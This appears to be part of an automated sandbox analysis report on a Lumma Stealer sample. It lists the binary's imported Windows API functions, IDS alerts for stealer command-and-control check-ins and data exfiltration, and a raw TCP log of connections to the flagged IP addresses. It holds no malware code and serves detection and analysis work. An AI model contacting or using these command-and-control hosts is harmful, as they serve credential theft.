                                                                                                                                                            kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                                                                                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                                                                                                                                                            user32.dllCreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                            msimg32.dllAlphaBlend
                                                                                                                                                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
                                                                                                                                                            version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                                                                                            mpr.dllWNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
                                                                                                                                                            kernel32.dlllstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
                                                                                                                                                            advapi32.dllSetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
                                                                                                                                                            comctl32.dllInitCommonControls
                                                                                                                                                            kernel32.dllSleep
                                                                                                                                                            oleaut32.dllGetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
                                                                                                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                                                                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                                            comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                            shell32.dllShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
                                                                                                                                                            shell32.dllSHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
                                                                                                                                                            comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                            ole32.dllCoDisconnectObject
                                                                                                                                                            advapi32.dllAdjustTokenPrivileges
                                                                                                                                                            oleaut32.dllSysFreeString

                                                                                                                                                            Possible Origin

                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                            EnglishUnited States

                                                                                                                                                            Network Behavior

                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                            2025-01-07T14:48:24.252351+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750188.114.97.3443TCP
                                                                                                                                                            2025-01-07T14:48:24.781192+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449750188.114.97.3443TCP
                                                                                                                                                            2025-01-07T14:48:24.781192+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449750188.114.97.3443TCP
                                                                                                                                                            2025-01-07T14:48:25.268050+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449751188.114.97.3443TCP
                                                                                                                                                            2025-01-07T14:48:25.743537+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449751188.114.97.3443TCP
                                                                                                                                                            2025-01-07T14:48:25.743537+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449751188.114.97.3443TCP
                                                                                                                                                            2025-01-07T14:48:26.366865+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449752188.114.97.3443TCP
                                                                                                                                                            2025-01-07T14:48:28.274178+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449752188.114.97.3443TCP
                                                                                                                                                            2025-01-07T14:48:28.874636+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449753188.114.97.3443TCP
                                                                                                                                                            2025-01-07T14:48:30.089413+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449754188.114.97.3443TCP
                                                                                                                                                            2025-01-07T14:48:33.035251+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449755188.114.97.3443TCP
                                                                                                                                                            2025-01-07T14:48:34.030662+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449756188.114.97.3443TCP
                                                                                                                                                            2025-01-07T14:48:35.004044+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449757188.114.97.3443TCP
                                                                                                                                                            2025-01-07T14:48:35.493784+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449757188.114.97.3443TCP
                                                                                                                                                            2025-01-07T14:48:36.452005+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449758185.161.251.21443TCP

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jan 7, 2025 14:48:23.764594078 CET49750443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:23.764674902 CET44349750188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:23.764786959 CET49750443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:23.767791986 CET49750443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:23.767826080 CET44349750188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:24.252276897 CET44349750188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:24.252351046 CET49750443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:24.258789062 CET49750443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:24.258805037 CET44349750188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:24.259143114 CET44349750188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:24.335743904 CET49750443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:24.335783005 CET49750443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:24.335932970 CET44349750188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:24.781213045 CET44349750188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:24.781305075 CET44349750188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:24.781367064 CET49750443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:24.783373117 CET49750443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:24.783396006 CET44349750188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:24.783442020 CET49750443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:24.783447027 CET44349750188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:24.790906906 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:24.791013956 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:24.791112900 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:24.792069912 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:24.792084932 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.267951012 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.268049955 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.269505978 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.269515038 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.269746065 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.271086931 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.271104097 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.271156073 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.743546009 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.743604898 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.743640900 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.743664980 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.743674040 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.743700027 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.743742943 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.743751049 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.743786097 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.744082928 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.744160891 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.746269941 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.746285915 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.748363972 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.748413086 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.748430014 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.748527050 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.748565912 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.748573065 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.748641014 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.748691082 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.749089003 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.749105930 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.749119043 CET49751443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.749125957 CET44349751188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.897253990 CET49752443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.897305965 CET44349752188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:25.897398949 CET49752443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.897685051 CET49752443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:25.897701025 CET44349752188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:26.366780043 CET44349752188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:26.366864920 CET49752443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:26.388135910 CET49752443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:26.388158083 CET44349752188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:26.388386965 CET44349752188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:26.391516924 CET49752443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:26.391798973 CET49752443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:26.391832113 CET44349752188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:26.391890049 CET49752443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:26.391896963 CET44349752188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:28.274183035 CET44349752188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:28.274286985 CET44349752188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:28.274419069 CET49752443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:28.274758101 CET49752443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:28.274775028 CET44349752188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:28.401660919 CET49753443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:28.401730061 CET44349753188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:28.401837111 CET49753443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:28.402187109 CET49753443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:28.402203083 CET44349753188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:28.874521971 CET44349753188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:28.874635935 CET49753443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:28.876116037 CET49753443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:28.876127005 CET44349753188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:28.876401901 CET44349753188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:28.877712965 CET49753443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:28.877851963 CET49753443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:28.877885103 CET44349753188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:29.407042027 CET44349753188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:29.407133102 CET44349753188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:29.407196999 CET49753443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:29.407440901 CET49753443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:29.407455921 CET44349753188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:29.608649969 CET49754443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:29.608694077 CET44349754188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:29.608931065 CET49754443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:29.609134912 CET49754443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:29.609149933 CET44349754188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:30.089302063 CET44349754188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:30.089412928 CET49754443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:30.091033936 CET49754443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:30.091051102 CET44349754188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:30.091290951 CET44349754188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:30.092731953 CET49754443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:30.092911959 CET49754443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:30.092947960 CET44349754188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:30.093034029 CET49754443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:30.093044996 CET44349754188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:31.009532928 CET44349754188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:31.009654999 CET44349754188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:31.009720087 CET49754443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:31.009928942 CET49754443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:31.009948969 CET44349754188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:32.559742928 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:32.559783936 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:32.559864044 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:32.560241938 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:32.560256958 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:33.035168886 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:33.035250902 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:33.036957026 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:33.036966085 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:33.037233114 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:33.038923025 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:33.039015055 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:33.039020061 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:33.469459057 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:33.469556093 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:33.469640017 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:33.469844103 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:33.469860077 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:33.548775911 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:33.548814058 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:33.548933983 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:33.549263954 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:33.549277067 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.030498028 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.030662060 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.032491922 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.032500982 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.032762051 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.055577993 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.055680990 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.055690050 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.543051004 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.543169975 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.543257952 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.543533087 CET49756443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.543559074 CET44349756188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.547749996 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.547785997 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:34.547888994 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.548191071 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:34.548203945 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.003927946 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.004044056 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:35.005501986 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:35.005512953 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.005752087 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.007061005 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:35.007086992 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:35.007129908 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.493788004 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.493880987 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.494010925 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:35.494446993 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:35.494446993 CET49757443192.168.2.4188.114.97.3
                                                                                                                                                            Jan 7, 2025 14:48:35.494468927 CET44349757188.114.97.3192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.494482040 CET44349757188.114.97.3192.168.2.4
